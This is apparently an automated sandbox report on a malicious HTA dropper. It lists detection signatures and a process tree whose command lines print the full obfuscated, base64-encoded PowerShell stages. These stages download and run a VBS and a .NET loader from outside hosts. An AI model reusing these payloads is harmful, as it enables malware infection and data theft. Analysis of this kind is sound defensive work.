Windows
Analysis Report
seemybestdayguvenu.hta
Overview
General Information
Detection
Cobalt Strike, FormBook, HTMLPhisher
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected HtmlPhish44
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
AI detected suspicious sample
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: AspNetCompiler Execution
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 1372 cmdline: mshta.exe "C:\Users\user\Desktop\seemybestdayguvenu.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
- cmd.exe (PID: 2836 cmdline: "C:\Windows\system32\cmd.exe" "/C poweRshElL.Exe -ex bypaSs -nOp -w 1 -c DEviCECrEdEnTIALDePLOYMENT.ExE ; INvoKe-eXPrESSioN($(INVOKe-EXPressION('[syStEm.text.eNCodinG]'+[cHar]58+[ChAr]0x3A+'Utf8.GEtSTrInG([SYsteM.cOnvErT]'+[ChaR]58+[ChaR]0X3A+'froMbAsE64strinG('+[Char]34+'JHN2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFUmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExlU3ZOR3Z3YWtaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWJFcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbWpGVFRlLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtVGtaVXFXVG53KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkdUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjI5Lzc3MC9zZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZXR0ZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3doYXRkb2luZ2ZvcmJlLnZiUyIsMCwwKTtTVEFSVC1TTGVlUCgzKTtpSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZS52YlMi'+[cHAr]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 4512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 6600 cmdline: poweRshElL.Exe -ex bypaSs -nOp -w 1 -c DEviCECrEdEnTIALDePLOYMENT.ExE ; INvoKe-eXPrESSioN($(INVOKe-EXPressION('[syStEm.text.eNCodinG]'+[cHar]58+[ChAr]0x3A+'Utf8.GEtSTrInG([SYsteM.cOnvErT]'+[ChaR]58+[ChaR]0X3A+'froMbAsE64strinG('+[Char]34+'JHN2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFUmRFZklOaVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT04uRExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExlU3ZOR3Z3YWtaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcWJFcyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhLbWpGVFRlLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtVGtaVXFXVG53KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkdUIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbXcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRzdjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTIzLjI5Lzc3MC9zZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZXR0ZXIudElGIiwiJEVudjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3doYXRkb2luZ2ZvcmJlLnZiUyIsMCwwKTtTVEFSVC1TTGVlUCgzKTtpSSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWVteWJlc3R0aGluZ3N3aGF0ZG9pbmdmb3JiZS52YlMi'+[cHAr]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- csc.exe (PID: 4540 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\3cxbggpe\3cxbggpe.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
- cvtres.exe (PID: 5724 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA8D6.tmp" "c:\Users\user\AppData\Local\Temp\3cxbggpe\CSC280B62266E03482F8F906EDB13385254.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
- wscript.exe (PID: 5552 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswhatdoingforbe.vbS" MD5: FF00E0480075B095948000BDC66E81F0)
- powershell.exe (PID: 3004 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $doctor = 'JGJlaSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRhbW9uaWVtaWEgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRxdWFscXVlciA9ICRhbW9uaWVtaWEuRG93bmxvYWREYXRhKCRiZWkpOyRhdGVycmFnZW0gPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcXVhbHF1ZXIpOyRsZWlyaWEgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGFjYXBuYSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGlucXVpZXR1ZGUgPSAkYXRlcnJhZ2VtLkluZGV4T2YoJGxlaXJpYSk7JHBlY3RhciA9ICRhdGVycmFnZW0uSW5kZXhPZigkYWNhcG5hKTskaW5xdWlldHVkZSAtZ2UgMCAtYW5kICRwZWN0YXIgLWd0ICRpbnF1aWV0dWRlOyRpbnF1aWV0dWRlICs9ICRsZWlyaWEuTGVuZ3RoOyRjb25kaWNlbnRlID0gJHBlY3RhciAtICRpbnF1aWV0dWRlOyRuaWNvbGF0byA9ICRhdGVycmFnZW0uU3Vic3RyaW5nKCRpbnF1aWV0dWRlLCAkY29uZGljZW50ZSk7JG1hZHJpbGhlaXJhID0gLWpvaW4gKCRuaWNvbGF0by5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkbmljb2xhdG8uTGVuZ3RoKV07JGNyZWR1bGlkYWRlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkbWFkcmlsaGVpcmEpOyRyZWRpemltYXIgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRjcmVkdWxpZGFkZSk7JHJlYmVsbGFkb3IgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKCdWQUknKTskcmViZWxsYWRvci5JbnZva2UoJG51bGwsIEAoJ3R4dC5BQ01BQy8wNzcvOTIuMzIxLjU0Mi4yNzEvLzpwdHRoJywgJyRyYXBhZG8nLCAnJHJhcGFkbycsICckcmFwYWRvJywgJ2FzcG5ldF9jb21waWxlcicsICckcmFwYWRvJywgJyRyYXBhZG8nLCckcmFwYWRvJywnJHJhcGFkbycsJyRyYXBhZG8nLCckcmFwYWRvJywnJHJhcGFkbycsJzEnLCckcmFwYWRvJykpOw==';$theatrelho = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($doctor));Invoke-Expression $theatrelho MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- conhost.exe (PID: 2644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- aspnet_compiler.exe (PID: 4976 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" MD5: FDA8C8F2A4E100AFB14C13DFCBCAB2D2)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Formbook, Formbo | FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware. | | | |
No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_HtmlPhish_44 | Yara detected HtmlPhish_44 | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen | |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security | ||
JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary
Source: | Author: Florian Roth (Nextron Systems)